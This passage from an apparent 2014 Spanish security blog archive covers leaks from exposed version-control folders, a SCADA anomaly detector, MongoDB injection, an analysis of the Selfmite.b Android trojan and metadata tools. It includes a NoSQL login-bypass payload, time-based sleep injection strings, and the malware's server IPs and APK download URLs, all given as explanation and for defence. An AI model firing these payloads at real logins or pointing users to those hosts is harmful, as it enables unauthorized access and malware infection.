de lo que parecen ser defectos (que amenazan el valor del producto) o problemas (que amenazan la continuidad y calidad de las pruebas). En relación a la documentación, se puede decir que se puede ir desde registrar todas las pruebas realizadas, a documentar únicamente los defectos. La tarea de documentar los errores no siempre depende del tester que los encuentre, ya que en situaciones comunes como las pruebas por parejas, dos personas crean los casos de pruebas y luego una los ejecuta y la otra documenta. Así se consigue un alto grado de rendimiento y concentración en la labor que se está realizando. Las pruebas basadas en sesiones es un método específicamente diseñado para el testing exploratorio auditable y medible a gran escala. Es por esto que en algunas empresas, como complemento a la hora de realizar el testing exploratorio, hacen uso de herramientas, (capturas de pantalla o vídeo, por ejemplo), que se usan a modo de registro de la sesión. Scripted Testing y Exploratory Testing Combinación Scripted Testing y Exploratory Testing En realidad, para realizar un test sobre aplicaciones no se tiene por qué optar a uno u otro enfoque. Una buena práctica de evaluación de calidad casi siempre es una combinación de testing exploratorio y testing basado en un guion de pruebas, aunque el equipo de QA siempre se va a tener tendencia hacia uno de los dos, dependiendo del tipo de proyecto, numero características e incremento de las mismas, etc. * QA: Pruebas para asegurar la calidad del producto software (I) Jhonattan Fiestas jhonattan.fiestas@11paths.com
6 de noviembre de 2014
Principales leaks en las herramientas de control de código
Las herramientas de control de código son muy habituales durante el desarrollo de aplicaciones. Permiten una imprescindible gestión y control de versiones cuando se trabaja en un proceso de desarrollo de software de cierta envergadura. ¿Qué información pueden ofrecer a un atacante si se encuentran mal configuradas? Herramientas como Git, Mercurial, Subversion y muchas otras resultan muy útiles pero también pueden comprometer la seguridad de la organización si quedan accesibles al exterior, no se configuran correctamente o se realizan malas prácticas durante el paso a producción. En esta entrada se recopilará brevemente la información más relevante que se puede extraer al encontrar un software de control de versiones desprotegido de alguna forma. Git Al crear un nuevo repositorio en local, el código usado por la aplicación se crea bajo la carpeta .Git, marcada como oculta. Puede que algún administrador copie esta carpeta a algún punto accesible por la red, y esto permitiría a un atacante obtener el código fuente de la aplicación con tan solo usar el comando git clone [url del repositorio]. Dependiendo de la tecnología o el gestor de contenido que use, se podrán ubicar archivos de configuración con mayor facilidad. En el caso, por ejemplo, de un gestor de contenido Wordpress, se podría detectar fácilmente el fichero de configuración wp-config, donde se encuentran las cadenas de conexión a la base de datos. Mercurial Al igual que Git, Mercurial ubica todos los archivos en la carpeta .hg, donde en primera instancia se puede encontrar el archivo dirstate, que enumera los ficheros que han sido procesados por Mercurial. Este archivo es clave para recuperar los posibles ficheros que se ubiquen todavía en la aplicación web y que conserven la misma ruta de acceso y el mismo nombre. En caso de que no se encuentre el archivo dirstate, se puede consultar el archivo undo.dirstate, que contiene información similar. Se crea como copia del dirstate para permitir un rollback. Los archivos de código fuente se ubican en el directorio store/data, donde se guardarán codificados con un algoritmo usado por Mercurial. Para obtener el código fuente en plano, se pueden usar clientes como SourceTree para recuperar el repositorio de código y trabajar de forma local. Bazaar Aunque no tan popular como los anteriormente citados, el software de control de código Bazaar es una alternativa que nació en 2007. Como el resto, si no se configura correctamente, puede permitir a un atacante obtener mucha información sobre la aplicación web. Bazaar almacena toda la información en el directorio .bzr. La información más relevante estaría ubicada en branch y repository. El directorio branch representa la rama en la que se está trabajando y por tanto en esta carpeta se ubican los archivos de configuración como branch.conf que muestran configuraciones para esa rama. Por otro lado, en la carpeta repository se ubican los archivos del repositorio, aunque para acceder a ellos se debe consultar primero el archivo pack-names y recuperar el nombre del archivo pack, que se encontrará a su vez en la carpeta packs. Aunque estos archivos son el "commit" completo, se deberá realizar una búsqueda a través de los índices ubicados en la carpeta "índices" para obtener el código fuente en texto plano. De nuevo, utlilizando cualquier cliente de Bazaar como Bazaar explorer, se puede descargar el repositorio completo. Subversion Finalmente y al igual que los demás programas de controles de código comentados previamente, la carpeta generada por Subversion es .svn, en la que se almacenará toda la información relativa al control de código. Dependiendo de la versión que se use, puede encontrarse el archivo entries, donde en texto plano se especificaran los archivos implicados, su tipo, permisos, la fecha de creación y el usuario. Por otro lado, en versiones más recientes se implementa una base de datos SQLite para almacenar los datos: wc.db, ubicada en la carpeta .svn. La diferencia es que el archivo wc.db se usa de índice para acceder al código fuente almacenado en un directorio llamado pristine, donde se guarda una copia del código fuente totalmente en plano. Está organizado por carpetas con el primer octeto del inicio del hash y dentro de la carpeta el propio fichero con el nombre del hash. Aplicaciones web que gestionan el código De forma más visual y más intuitiva las aplicaciones web pueden ayudar mucho en el desarrollo de software, pero también hay que fortificarlas adecuadamente para que no accedan usuarios no autorizados. Un claro ejemplo es interfaz web del gestor de código ViewVC, que permite a los usuarios navegar a través de todo el árbol de archivos y recorrer las versiones realizadas sobre los archivos en un repositorio de código CVS o Subversion. Si el acceso a esta aplicación web no se restringe correctamente puede dar a un atacante una vía perfecta para obtener el código fuente de la aplicación de la organización. Ejemplo de ViewVC Al igual que existen aplicaciones web que permiten visualizar el código de la aplicación, también se deben controlar y proteger las aplicaciones web que permiten la ejecución del código como Buildbot o Jenkins que pueden ser de gran utilidad a los atacantes. Este tipo de aplicaciones web, son detectadas por Faast y reportadas en forma de vulnerabilidad para alertar de la su existencia: Evidencia de Faast Faast y herramientas de control de código En Faast se han implementado plugins que permiten la detección de repositorios de código abiertos y sin restricción. Permitiría identificar lo que un posible atacante sería capaz de obtener: desde el código fuente de la aplicación, hasta cadenas de conexión a máquinas, base de datos o servicios en general. Potencial problema de seguridad reportada a través de la interfaz de Faast Gracias a los plugins específicos, una vez detectado el repositorio de código, Faast analizará el resto de ficheros correspondientes a la tecnología concreta para aumentar la cantidad de activos disponibles. Así, reportaría archivos de configuración del propio repositorio de código y en caso de que estuviesen, los archivos del código fuente y su ruta accesible a través de la red. Evidencia en el plugin de Faast sobre una debilidad en Mercurial Óscar Sánchez oscar.sanchez@11paths.com
4 de noviembre de 2014
BANDS: Detección proactiva de amenazas en infraestructuras críticas
En 1983 una infiltración en el Mando Norteamericano de Defensa Aeroespacial (NORAD), estuvo a punto de desatar la tercera guerra mundial. Por suerte, en el último momento, justo antes de que se lanzaran los misiles nucleares estadounidenses, se descubrió que en realidad todo era una falsa alarma provocada por un muchacho espabilado, que con un ordenador primitivo y un simple módem había quebrantado el más avanzado sistema de seguridad. Solo fue un juego. En realidad, esto nunca sucedió sino que se trata del argumento de la película de ficción Juegos de Guerra (WarGames, John Badham, 1983). A principios de los ochenta, en aquellos años de pantallas de fósforo verde e interminables líneas de comandos, pudo parecer que estas amenazas informáticas eran simplemente un entretenimiento juvenil, fruto de mentes calenturientas y, aunque resulte un tópico, una vez más la ciencia ficción se adelantó a su tiempo y nos presentó circunstancias posibles dentro de un marco imaginario que se han hecho realidad. Veintisiete años después, en 2010, los ataques militares a las plantas nucleares iraníes llevados a cabo con el malware Stuxnet se hicieron mundialmente conocidos (incluso para aquellos ajenos a la seguridad informática). Por primera vez la sociedad fue consciente de que las amenazas informáticas no solo comprometen el mundo digital, sino que también son un riesgo, mucho mayor si cabe, para el mundo físico. A partir de entonces la seguridad se convierte en la prioridad para el sector industrial. En el mundo presente, donde todas las infraestructuras están interconectadas, las consecuencias de un ciberataque en infraestructuras críticas pueden ser fatales. De todos modos, y conteniendo el alarmismo, hay que constatar que este ataque contra los sistemas SCADA de Irán fue posible porque nadie lo había anticipado, y por eso las defensas eran mínimas. En la actualidad, los niveles de seguridad han aumentado considerablemente. Entonces, ¿estamos a salvo? Mucho se ha avanzado en seguridad industrial de infraestructuras SCADA, incluso se ha legislado normativa al respecto. Aun así, es una necesidad anticiparse al cibercrimen, así que nuevas y más dinámicas estrategias son necesarias, en concreto aquellas que se adapten a la vertiginosa mutabilidad de las amenazas. Cabe en este punto recordar a quienes ya conocen y también informar a los neófitos acerca de que es SCADA. SCADA es el acrónimo de Supervisión, Control y Adquisición de Datos. Este tipo de infraestructuras consiste en una arquitectura centralizada de computadores. El objetivo es la supervisión y el control remoto y automático de una instalación o proceso industrial. En concreto, permite que un ordenador central reciba información en tiempo real de los dispositivos de campo (sensores y actuadores), y controla el proceso automáticamente. Los protocolos usados pueden ser muy variados (MODBUS, IEC104, etcétera), así como las tecnologías de comunicación (LAN, radio, línea telefónica, etcétera). Otra característica relevante que les hace más o menos vulnerables es que pueden o no estar conectados a Internet. En la actualidad, lo más frecuente es que si estén interconectados con el exterior, puesto que se hace necesario que los departamento de negocio, habitualmente no localizados en la propia industria, tengan acceso al proceso industrial. Tradicionalmente, la seguridad para las infraestructuras SCADA se ha estado basando en estrategias estáticas que comprenden: la auditoría de la red para eliminar posibles brechas de seguridad; el aislamiento de la red o el bloqueo de intrusión por medio de cortafuegos; y fortalecer la seguridad de los terminales –esclavos o maestros– desconectando servicios innecesarios del sistema operativo, el análisis y resolución de bugs de los sistemas operativos y el uso de antivirus. Topología BANDS usando Sinfonier La original solución que propone el proyecto BANDS de Telefónica, incluida en la gama de servicios Saqqara, es la detección de anomalías en tiempo real buscando las secuelas que produce un ataque o cualquier otro tipo de incidente. BANDS está construido sobre la plataforma Sinfonier de procesamiento en tiempo real (tecnología Storm de Apache). BANDS es un sistema de monitorización y detección de intrusión que detecta los eventos inusuales, tanto ataques cibernéticos como errores operativos, y logra este objetivo modelando patrones de compartimiento por medio de la monitorización de todo el tráfico de red en tiempo real. BANDS hace acopio de las tramas IP que intercambian los dispositivos de la red para extraer información de ellas. BANDS no busca la amenaza en sí, que puede haber mutado y ser irreconocible, sino las repercusiones que esta tiene sobre el sistema SCADA. A partir de esta información es capaz de: Construir una topología de la red de acuerdo al comportamiento de cada dispositivo, Detectar si se incorporan nuevos terminales desconocidos a la red o algún terminal asume un rol distinto al que venía ocupando, Identificar el patrón de conexiones, volumen de datos y frecuencia habitual, y alertar si hay cambios en el patrón normal, Alertar de inmediato en caso de que un terminal pierda la comunicación, Monitorizar el comportamiento de los PLCs y detectar comportamientos anómalos tales como comandos no habituales, perdidas de medidas, superación de umbrales o congelación de medidas (esta funcionalidad se logra gracias a que BANDS interpreta protocolos SCADA), Utilizar información externa a modo de contexto para ser utilizada en el proceso de modelado y análisis de las plataformas. Esto permite conocer de manera inmediata si se ha producido un ataque e incluso posibles errores accidentales como la perdida de conectividad de un terminal. Proceso de construcción de topologías con Sinfonier Con el doble propósito de que BANDS no solo permita el procesamiento en tiempo real, sino también la personalización de las detecciones incorporando el conocimiento de las infraestructuras propias de los clientes, el proyecto se ha desarrollado sobre Sinfonier. Sinfonier es una plataforma que posibilita la creación edición y gestión de topologías para procesar flujos de datos por el sistema de computación en tiempo real Apache Storm. Con Sinfonier, aparte de escalabilidad, dinamismo y tolerancia a fallos, se posibilita la facultad del trabajo conjunto y colaborativo entre Telefónica y sus clientes. Sinfonier permite crear módulos de procesamiento de manera sencilla y fácilmente integrable. Sinfonier ofrece una interfaz web para combinar los módulos de procesamiento –los propios y los genéricos alojados en la comunidad por Telefónica y otros desarrolladores– para así construir topologías complejas a un golpe de click . De este modo, se propicia que la propia industria para que diseñe a medida su sistema de seguridad de BANDS de acuerdo a sus necesidades específicas. Sinfonier combina un interfaz fácil de usar, modular y adaptable e integrado con otras soluciones avanzadas de seguridad, que sirven tanto como fuente de datos como destino de ellos. Patrones que BANDS es capaz de reconocer En resumen, las principales características de BANDS-Sinfonier son: Sistema de computación en tiempo real Storm Apache. Modelado de patrones de compartimiento en tiempo real. Aprendizaje autónomo. Detección de anomalías de red IP. Detección de anomalías de protocolos SCADA (MODBUS e IEC104). Gestión de alertas a través de un portal web. Fácilmente escalable. Cliente final puede desarrollar sus propios módulos de procesamiento o bien los que están disponibles en la comunidad Sinfonier. • Interfaz web para la construcción de topologías de procesamiento. Altamente configurable. Capacidad de procesado de información de otros sistemas o servicios. Disponibles Soportado por comunidad Sinfonier. Evaluación práctica de BANDS. Fue llevada a cabo en una central eléctrica, donde quedó patente que este servicio es capaz de dar respuesta a los problemas característicos de un Centro de Control (CC) de producción eléctrica. BANDS fue capaz de detectar el siguiente tipo de anomalías: Detección de interrupción en el reporte periódico y constante de medidas de generación eléctrica enviados desde las centrales al CC. Detección de medidas erróneamente reportadas al CC, tanto medidas congeladas como medidas fuera del rango esperado. Detección de otras situaciones interesantes para el administrador de un CC como son la detección de mensajes extraños, la aparición de nuevos hosts (servidores y centrales) y las anomalías horarias. Pasando a un plano más específico, BANDS detectó en las instalaciones las siguientes situaciones anómalas. Estas detecciones se produjeron en tiempo real y también mediante un análisis detallado offline del proceso de modelado y sus resultados: Switching de los dos servidores SCADA descubiertos en dos ocasiones. Esto ha dado lugar a una serie de alertas, descartables todas ellas por venir derivadas de dichos cambios de servidor. Descubrimiento de centrales de producción no recogidas en la relación de centrales facilitada a los autores de este estudio. Además, algunas centrales jamás se han visto intercambiando mensajería con los servidores SCADA más allá de simples intentos de establecimiento de conexión TCP. Pérdida generalizada de reportes de medidas, durante cortísimos periodos de tiempo que en todo caso no parecen afectar al funcionamiento general del sistema SCADA. Existencia de determinadas medidas congeladas en un valor concreto, durante largos periodos de tiempo. Medidas que sobrepasan los rangos efectivos o aprendidos para cada uno de los tipos de mensaje existentes. Quedaría por comprobar que no sean falsos positivos al enfrentarlos a los rangos teóricos. Francisco Oteiza francisco.oteizalacalle@telefonica.com Francisco Jesús Gómez franciscojesus.gomezrodriguez@telefonica.com David Prieto david.prietomarques@telefonica.com
30 de octubre de 2014
Cómo funcionan las MongoDB Injection
Las inyecciones SQL han sido tradicionalmente uno de los vectores de ataque más utilizados por los atacantes. De hecho, es una de las técnicas más eficaces para el robo y la alteración de información sensible. Sin embargo, no existe (aún) una marcada tendencia hacia la explotación de las llamadas bases de datos NoSQL, o sea, bases de datos no relacionales pensadas para el almacenamiento de grandes cantidades de información. De entre todas estas bases de datos NoSQL, quizá el representante más ilustre sea MongoDB. ¿Es inmune a las inyecciones? ¿Qué es MongoDB? El nombre MongoDB, viene del inglés "humongous" (inmenso). Es un sistema de base de datos no relacional de código abierto y orientado a documentos. MongoDB se basa en colecciones de documentos Json, lo que le otorga una gran flexibilidad en cuanto a la naturaleza de la información que almacena, puesto que puede haber documentos con diferente esquema dentro de una misma colección. De MongoDB destaca su gran velocidad y escalabilidad, porque puede manejar sin apenas esfuerzo volúmenes de datos del orden de gigabytes. En los últimos tiempos, su nómina de clientes ha crecido considerablemente; Foursquare, MTV, The New York Times, etc. ya lo utilizan. ¿Es MongoDB vulnerable a inyecciones? Al no tratarse de una base de datos SQL, podría parecer que MongoDB no es vulnerable a inyecciones maliciosas. Sin embargo, veremos que no es así. Se pueden realizar muchos tipos de inyecciones en MongoDB, aunque la viabilidad del ataque depende en gran medida del driver de Mongo utilizado. Por ejemplo, en PHP es posible realizar una inyección muy similar a la clásica inyección SQL, alterando la consulta de manera que devuelva todo el contenido de una colección. Imaginemos la típica consulta de credenciales que hay tras un login. En SQL, sería algo como lo que sigue: SELECT * FROM tUsers WHERE username = ‘username’ AND password = ‘password’ La consulta equivalente en MongoDB sería: $collection -> find(array( “username” => $_GET[‘username’], “password” => $_GET[‘password’] )); El problema es que PHP permite pasarle objetos al driver de MongoDB, sin que tengan que ser necesariamente strings. Explotando esta vulnerabilidad, podemos pasar un objeto que fuerce una condición "true" y provoque el volcado de la colección. Por ejemplo, enviando una petición como esta: login.php?username=administrador&password[$ne]=1 Obtendríamos una consulta interna de esta forma: $collection -> find(array( “username” => "administrador" “password” => array("$ne" => 1) )); Esta consulta devuelve las credenciales de todos los usuarios cuyo nombre de usuario y contraseña sea distinto ("not equal", $ne) de 1, condición que probablemente cumpla cualquier contraseña. La solución pasa por "tipar" los objetos que se le pasan al driver. El hecho de que muchos drivers de MongoDB admitan objetos no tipados supone una vulnerabilidad. ¿Cómo comprobar si se es vulnerable? Como no podía ser de otra manera, Faast incorpora entre su batería de plugins, uno capaz de detectar vulnerabilidades de este tipo. Sin embargo, como ya se ha mencionado, la presencia de esta vulnerabilidad depende enormemente del driver utilizado en el dominio bajo análisis. Existen multitud de drivers para MongoDB. El plugin de Faast está orientado a detectar inyecciones en MongoDB, aprovechando la capacidad del motor Mongo para ejecutar Javascript. Utiliza la técnica de time-based detection para determinar si la URL que recibe como parámetro es vulnerable, aprovechando a su vez el comando "sleep" de MongoDB, que bloquea todas las operaciones de la base de datos durante un determinado período de tiempo. Por ejemplo, tras recibir la URL, el plugin de Faast realiza dos peticiones independientes, concatenando las siguientes cadenas a la URL original. En la primera se ejecuta un sleep durante 10 segundos, en la segunda, no. ;if(tojson(this)[0] =="{")) {sleep("10000")}; ;if(tojson(this)[0] =="{")) {sleep("0")} Para determinar si es posible inyectar, se compara el tiempo de respuesta de ambas peticiones. Si la diferencia de tiempos es superior a un determinado umbral, se considera positivo y por tanto la URL es vulnerable. Para minimizar la influencia de tiempos de propagación, etc… y evitar falsos positivos, la prueba se repite un número determinado de veces. Será necesario que el resultado de los N intentos sea positivo para considerar la URL como vulnerable. El auge que están viviendo los motores de bases de datos no relacionales, hace que se conviertan en un objetivo prioritario para los atacantes. Aunque las inyecciones SQL siguen siendo frecuentes, ya no representan una novedad en el mundo del cibercrimen, y las recetas y buenas prácticas para evitarlas están muy estudiadas. Sin embargo, las bases de datos NoSQL suponen un territorio nuevo que explorar. Por eso Faast pretende adelantarse a los atacantes y facilitar que se tomen las medidas adecuadas para salvaguardar la integridad de los datos de los clientes. Cristóbal Bordiú cristobal.bordiu@11paths.com
28 de octubre de 2014
¿Quién sale ganando con Selfmite.b?
Ha saltado a los medios generalistas la noticia de una segunda versión de Selfmite.b (un troyano para Android) que ha sido "perfeccionada" y es más agresiva que su antecesora. Vamos a analizar un poco qué es lo que no han dicho los medios, o por dónde han pasado de puntillas. Selfmite En junio apareció Selfmite.a, un malware chino que se esparcía por SMS enviando por este medio un enlace a varios contactos de la agenda. Selfmite.b se ha anunciado como una mejora sustancial de esta primera versión. Según sus descubridores, también "inyecta código en una versión troyanizada de la app legítima Google Plus que aparece tras la instalación". Lo que parece es que está creado a partir de un Google Plus reempaquetado. De hecho, el nombre del paquete, com.google.gsn.plus así lo indica. ¿Por dónde se inició este "gusano por SMS"? Pudo haber una efímera (apenas unas horas) aparición de un paquete con este nombre en Google Play, en lo que pudo ser el primer vector de infección. Como novedad, el troyano se basa en un archivo de configuración que descargaba de una URL concreta. El mensaje que enviaba por SMS dependía de lo que encontrara en ese archivo de configuración dinámico. ¿De verdad que ha infectado a tantos? El troyano envía SMS con los enlaces a publicidad a toda la lista de contactos. En bucle. No es un comportamiento discreto, desde luego. Según los descubridores (que no indican cómo se ha realizado el cálculo), se han enviado 150.000 mensajes SMS a causa del troyano... pero solo desde 100 dispositivos infectados, aunque su factura de teléfono habrá sido abultada. Los países más afectados dice que son Canadá, China, Costa Rica, Ghana, India... ¿Cómo lo saben? Selfmite.a contenía un acortador de URLs de Google en su interior. Solo había que mostrar las estadísticas de "hits" en ese enlace. Selfmite.b utiliza servicios de acortación de urls de GoDaddy (x.co). Supongamos que han hecho los mismos cálculos con GoDaddy y esto daría una idea del número de infectados y país desde donde se ha hecho click. Sin embargo, afirmar que los países más infectados son los mencionados puede resultar inexacto. Primero porque el número absoluto no es demasiado (¿100 infectados?) y segundo porque cualquier click desde cualquier ordenador en cualquier país abultaría esas cifras, sin necesidad de indicar una infección real. Un fallo de Selfmite.a fue usar este enlace acortador incrustado en su código. En Selfmite.b, el archivo de configuración, sin embargo, podía cambiarse dinámicamente puesto que se alojaba en la dirección IP 209.190.28.50, entre otros datos de configuración. Esta IP pertenece a una empresa, xlhost.com que no ha retirado el archivo hasta después de dos semanas desde que se dio a conocer la noticia. Lo cierto también es que aunque no se retiró el archivo de configuración, los creadores del troyano tampoco lo actualizaron tras ser detectada la muestra, incluso cuando ya los acortadores no funcionaban. En Selfmite.a, la IP era 173.244.174.238, que pertenece al mismo hosting. Algo interesante desde el punto de vista técnico, es que el malware se registra como administrador de dispositivo en Android, y esto hace más difícil eliminarlo. No se puede "desinstalar" como una app normal, sino que primero hay que quitarle ese "privilegio". También roba datos como el IMEI y otra información. ¿Actuaba según el país? Han dicho que sí, pero es incompleto. También influye el navegador y en general los términos propios de la empresa de publicidad que gestionaba el link enviado por SMS. Aquí entramos dentro del asunto de la monetización. Todo malware se crea para obtener un beneficio. El modelo de negocio en este caso para Selfmite.b era obtener "comisiones" por instalar programas o conseguir visitas y generar tráfico. El sistema era el siguiente: Instala diferentes iconos en el escritorio del teléfono, tomados de http://209.190.28.50/icon.php. Estos iconos conducen a ditintas URLs que varían según el archivo configurador que se descarga. Estas urls pertenecen a agencias de publicidad que redirigen al usuario a diferentes páginas según varios parámetros. En concreto, las compañías de publicidad han sido las chinas Avazu INC a través de su dominio avazutracking.net y Yeahmobi. Al visitar estos enlaces, por ejemplo, si eres de Rusia, te enviará el APK del market chino Mobogenie, que no es reconocido precisamente por su escrupulosa elección de apps... y sí por sus agresivas campañas de difusión. Si eres de otros países, podrá derivar a servicios que piden permiso para suscribir a servicios premium. ¿Y si eres de España? En algunos medios se ha dicho que no afecta a España, o que no aparece entre los países afectados. Lo segundo es cierto, lo primero no. Un usuario español podría infectarse perfectamente. En primer lugar porque comenzaría a enviar SMS como cualquier otro (con lo que se benefician las operadoras, pero de forma totalmente colateral). En estos días hemos observado que avazutracking.net se encarga de dirigir a varios sitios, según el momento, el navegador, la hora, el país... y según haya pagado la empresa para anunciarse a través de Avazu. Esta es una pequeña recopilación de "destinos" del servicio de redirección. Puede que intente descargar este apk: http://rtb.impresionesweb.com/apps/bestApps/BestApps.apk. Se trata de una app de mobusi.com, una empresa de publicidad. Puede que intente llevar a una web de suscripción por SMS. Hemos detectado estas dos: m.es.mobiplus.me/wap/9228/?af=215&af_code=7574325704 http://46premier.mega-cine.com/streaming Puede que redirija a aplicaciones legítimas de Google Play https://play.google.com/store/apps/details?id=com.apusapps.launcher También, puede llevar a apps pornográficas por suscripción. land.porn4you.mobi Como último recurso, intenta siempre descargar el market de Mobogenie: http://download.moborobo.com/mobomarket/appcoachs/appsflyer/035/MoboMarket.apk ¿Quién gana con todo esto? En ningún momento estamos afirmando o insinuando que los programas o páginas anteriores hayan realizado una actividad ilegal o estén al tanto del troyano. Eso sí, parecen empresas de publicidad "agresiva" que recompensa a quienes les envíen visitas más ajustadas a su "target", lo que resulta inevitablemente en un ecosistema no demasiado escrupuloso en el que no importa de dónde vengan los usuarios, solo que vengan. Todo esto es un efecto colateral del troyano pero que les beneficia. Lo más probable que haya ocurrido, es que estén afiliadas a la empresa de publicidad por enlaces y poco más. Les reporta tráfico, que es lo que desean. El creador del troyano, por su parte, también puede que gane por cada click o instalación que culminen después de seguir el enlace. Archivo de configuración de Selfmite.b También se benefician las empresas intermediarias cuyos enlaces aparecen en el archivo de configuración redirigiendo a la publicidad, en este caso Avazu (dueña de avazutracking.net) y Yeahmobi. Ganan igualmente Mobogenie y el creador del troyano... como curiosidad, todos son chinos. Investigar sobre estas compañías en cualquier buscador remite habitualmente a usuarios descontentos a los que los "servicios" de esta empresa les resultan, como mínimo, agresivos. Extracto de código de Selfmite.b Tampoco significa que Avazu o Yeahmobi estén al tanto del troyano. No es más que la explotación de un esquema típico de publicidad. El único culpable real es el programador del malware. De hecho, con la ayuda de algunas pistas del archivo de configuración (donde aparece su número de afiliado a la plataforma de anuncios Yeahmobi, entre otros datos), se podría llegar a descubrir a dónde van los beneficios económicos del malware por publicidad y de ahí, qué otras apps existen que hayan podido ser creadas por el mismo autor. Pero aun así, en realidad, todos salen ganando menos el usuario infectado. ¿Significa eso que la empresa de publicidad ha creado el troyano? Ni mucho menos. Esto es tanto como alimentar el antiguo mito que aseguraba que las casas antivirus creaban las muestras. Este troyano parece más bien una prueba de concepto, muy mejorable, destinado a mantener un esquema de adware que, como consecuencia deseada o no, da un empujón al negocio de una empresa de publicidad. También es importante destacar, que, al margen de los titulares escandalosos, el peor efecto para el usuario ha sido el envío de SMS indiscriminado y el robo de información, que ocurre sin que sea consciente. Sergio de los Santos ssantos@11paths.com @ssantosv
25 de octubre de 2014
Análisis de metadatos: Extract Metadata vs. Metashield Analyzer
La recopilación de información se ha convertido en un negocio lucrativo para empresas y supone una interesante estrategia para gobiernos y organizaciones que hacen uso de ella... además de una herramienta útil para atacantes a largo plazo. Una fórmula para mitigar ambos riesgos puede ser cuidar no solo los datos, sino también los metadatos de los archivos que ofrecemos al exterior. ¿Cuáles son? Analicemos dos herramientas online que muestran los metadatos de un archivo. Una de ellas, por supuesto, Metashield Analyzer. Para poder comprobar la cantidad de metadatos que obtenemos, hemos realizado una comparativa con dos herramientas online gratuitas: Metashield Analyzer y Extract Metadata. La primera es de esta empresa, y con la pequeña comparativa se pretende mostrar por qué pensamos que es más completa. Ambas comprueban ficheros de diferentes formatos y muestran el contenido de la información oculta. Para la prueba hemos utilizado dos archivos: una imagen tomada con un smartphone y un documento generado con Libre Office y así poder tener una idea del volumen de datos que se podrían extraer de distintos archivos. En el caso de la imagen, la analizamos con la herramienta " Extract Metadata", pero en la página indican que disponen de otra herramienta específica para analizar fotografías online " ExifViewer.org" que también usaremos y esperamos complemente y amplíe la información extraída de la imagen. El listado de extensiones que analiza Extract Metadata que es bastante amplio. Incluye archivos de audio y algunos de vídeo, pero está limitado a ficheros de menos de 5Mb. Resultado del envío de una imagen a Extract Metadata El análisis nos ofrece una serie de datos significativos del dispositivo que realizó la imagen originalmente: tamaño, posición en la que estaba el dispositivo en el momento de la captura, fecha y otros datos técnicos relativos a la toma de la fotografía. En ExifViewer.org, se ofrece algo más de información. Resultado del envío de una imagen a Exif Viewer Estos datos en sí no suponen un gran riesgo potencial, pero sí es cierto que ofrecen información sobre un espacio temporal y un modelo de dispositivo concreto como datos más relevantes. A continuación realizamos la misma operación con el MetaShield Analyzer. Cuando se envía el archivo, un aviso informa de que ninguno de los archivos o metadatos que se extraigan del análisis serán almacenados. El listado de extensiones que pueden ser analizadas es menor, pero la razón es que está orientado exclusivamente al análisis de extensiones de documentos ofimáticos, PDF e imágenes JPG. Acepta ficheros de hasta 35 Mb. El tiempo de proceso del análisis es algo inferior al empleado por Extract Metadata y la cantidad de datos recibidos superior. También la relevancia de los datos es más significativa, puesto que los metadatos de la fotografía incluyen la geolocalización, por ejemplo. Resultados del análisis de fotografías con MetaShield Analyzer Algo interesante es que Metashield Analyzer indica si la imagen ha sido retocada y el programa utilizado para ello, que en este caso es Photoshop en su versión 2014. Este dato es importante y podría indicar una manipulación intencionada de la fotografía. Vamos ahora a analizar un documento ofimático generado con Libre Office con las mismas herramientas. Usamos la herramienta Extract Metadata y los datos que nos ofrece son: Resultados de enviar un fichero de Libre Office a Extract Metadata El análisis nos da unos detalles básicos del usuario creador, la fecha y software utilizado. Si realizamos la prueba con Metashield Analyzer, los datos son más numerosos: Resultado de enviar un fichero Libre Office a MetaShield Analyzer La información obtenida nos ofrece datos detallados hasta de una imagen incrustada en el propio documento, impresora con la que se ha trabajado, programa que se usó para el retoque fotográfico, S.O del equipo, ediciones, etc.
10 de octubre de 2014
Eleven Paths en la 8dot8: Superhéroes
El próximo 23 de octubre tendrá lugar una nueva edición de la 8dot8, el congreso que se celebra en Chile durante dos días con diferentes ponentes de Colombia, Perú, Argentina, México, Suiza, España y la propia Chile. En esta ocasión asisten como ponentes los compañeros Pablo González y Claudio Caracciolo. La charla de Pablo será "Cyberwar: Looking for… citizen!", dónde se habla acerca de cómo la ciberguerra afecta o es visualizada por los ciudadanos. A lo largo de los últimos años, gracias al abaratamiento de los costes de la tecnología y a la reducción de las tarifas de las conexiones a Internet, el uso de tecnología por parte de cualquier organización y Estado se encuentra más extendida. Toda esta tecnología ha llevado al nacimiento de un mundo digital (estrechamente unido al mundo físico) donde las acciones tienen repercusiones tanto en uno como en otro. Y una de esas acciones podría ser la ciberguerra. Hoy en día, casi cualquier persona puede disponer de tecnología a un coste relativamente bajo, por lo que si se sumase toda esta tecnología ciudadana de bajo coste, podría alcanzarse una potencia a la que por sí solo una entidad no podría llegar. En este trabajo, se ha realizado un piloto con dispositivos móviles de tipo Android (por su gran cuota de mercado) aunque este modelo es extensible a otros sistemas y componentes. Se ha analizado cómo Internet y las nuevas tecnologías han situado a usuarios con y sin recursos en un plano equivalente, en el que los usuarios con menos recursos puedan alcanzar objetivos en los que en otras circunstancias no serían posibles, gracias a la democratización de la tecnología. Algunas de las funcionalidades importantes serían, por ejemplo, la posibilidad de poder utilizar en remoto la cámara y el micrófono de los dispositivos que se distribuyen geográficamente y que se puede controlar desde la infraestructura. La posibilidad de disponer en cualquier instante de una cámara o micrófono en un sitio de conflicto es una funcionalidad realmente interesante en un conflicto de ciberguerra. Otro escenario que hace interesante esta funcionalidad, es la utilización de dispositivos en manifestaciones u otros acontecimientos donde se concentran gran cantidad de personas y existe riesgo de acciones violentas. O quizá, solamente obtener una shell con la intención de realizar acciones desde el dispositivo. Al final disponemos en el bolsillo de dispositivos altamente potentes, más de lo que a día de hoy podemos imaginar. También podremos ver cómo los canales de distribución de apps, App Store, Google Play, etcétera, podrían resultar vías muy potentes para conseguir alistar usuarios a una tecnología de ataque centralizada. A partir de ello, se podrá tratar el tema de qué cosas se pueden hacer desde el terminal en función de los permisos. ¿Suficiente para ceder la tecnología que llevas en el bolsillo ante un posible conflicto? Claudio Caracciolo hablará de la necesidad que tienen hoy en día los superhéroes para protegerse. En efecto, hoy en día los incidentes de seguridad, como robos de contraseñas, ataques a sitios de terceros en los que el usuario deposita su confianza son cada vez más habituales, por lo que se necesitan medidas que ayuden a fortificar nuestra identidad digital y ser capaces de detectar y protegernos ante estas situaciones. Además, habrá otros 12 excelentes ponentes con charlas que seguro resultarán interesantes. Os esperamos el 23 y 24 de octubre de 2014 en Santiago de Chile.
8 de octubre de 2014
Cómo lanzar escaneos con Faast
